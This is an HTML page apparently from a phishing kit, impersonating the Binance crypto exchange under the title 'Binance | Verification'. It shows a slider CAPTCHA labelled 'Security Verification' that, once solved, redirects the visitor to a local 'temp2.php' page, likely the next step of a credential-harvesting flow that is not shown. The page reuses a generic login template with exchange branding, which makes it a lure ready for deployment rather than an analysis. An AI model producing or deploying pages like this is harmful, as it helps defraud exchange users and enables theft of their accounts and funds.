﻿<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="lib/font-awesome/css/font-awesome.min.css" rel="stylesheet">
    <link href="disk/slidercaptcha.min.css" rel="stylesheet" />
	<meta charset="utf-8" />
    <meta name="robots" content="follow,index" />
    <title>Binance | Verification</title>
    <meta name="description" content="Binance Global INC Crypto Trade Assets" />
    <meta name="keywords" content="login page css, login template, login css, login form template" />
    <link rel="apple-touch-icon" sizes="180x180" href="images/apple-touch-icon.png" />
    <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png" />
    <link rel="icon" type="image/png" sizes="16x16" href="images/favicon-16x16.png" />
    <link rel="manifest" href="https://mazipan.github.io/login-page-css/manifest.json" />
    <meta name="msapplication-TileColor" content="#fdcb04" />
    <meta name="theme-color" content="#fdcb04" />
    <link rel="manifest" href="https://mazipan.github.io/login-page-css/manifest.json" />
    <link rel="stylesheet" href="css/index.cdd05366.css" />
    <link rel="stylesheet" href="css/index.6a037238.css" />
    <link rel="stylesheet" href="css/index.fd599eac.css" />
	
	<link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700&amp;display=swap" rel="stylesheet" />
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-25065548-2"></script>
	
    <style>

        .slidercaptcha {
            margin: 0 auto;
            width: 330px;
            height: 286px;
            border-radius: 0px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.125);
            margin-top: 40px;
        }

            .slidercaptcha .card-body {
                padding: 1rem;
            }

            .slidercaptcha canvas:first-child {
                border-radius: 0px;
                border: 1px solid #e6e8eb;
            }

            .slidercaptcha.card .card-header {
                background-image: none;
                background-color: rgba(0, 0, 0, 0.03);
            }

        .refreshIcon {
            top: -48px;
        }
    </style>
</head>



<body>
  <div class="app">
            <div class="login-page">
                <header class="header">
                    <div class="header__content">
                        <div class="header__logo logo">
                            <img src="images/logo.png" alt class="logo__img">
                        </div>
                        <ul class="header__nav nav">
                            <li class="nav__item"><a href="#" class="nav__link">Register</a></li>
                        </ul>
                    </div>
                </header>
				</br>
				</br>
				</br>
				</br>
				</br>
				</br>
				</br>
				</br>
				
				
    <div class="container-fluid">
        <div class="form-row">
            <div class="col-12">
                <div class="slidercaptcha card">
                    <div class="card-header">
                        <span>Security Verification</span>
                    </div>
                    <div class="card-body">
                        <div id="captcha"></div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="disk/longbow.slidercaptcha.min.js"></script>
    <script>

        var captcha = sliderCaptcha({
            id: 'captcha',
            setSrc: function () {
                return 'http://imgs.blazor.zone/images/Pic' + Math.round(Math.random() * 136) + '.jpg';
            },
            onSuccess: function () {  //成功事件
                var handler = setTimeout(function () {
                    window.location.href = './temp2.php';
                    
                }, 100);
            }
        });
    </script>
</body>

</html>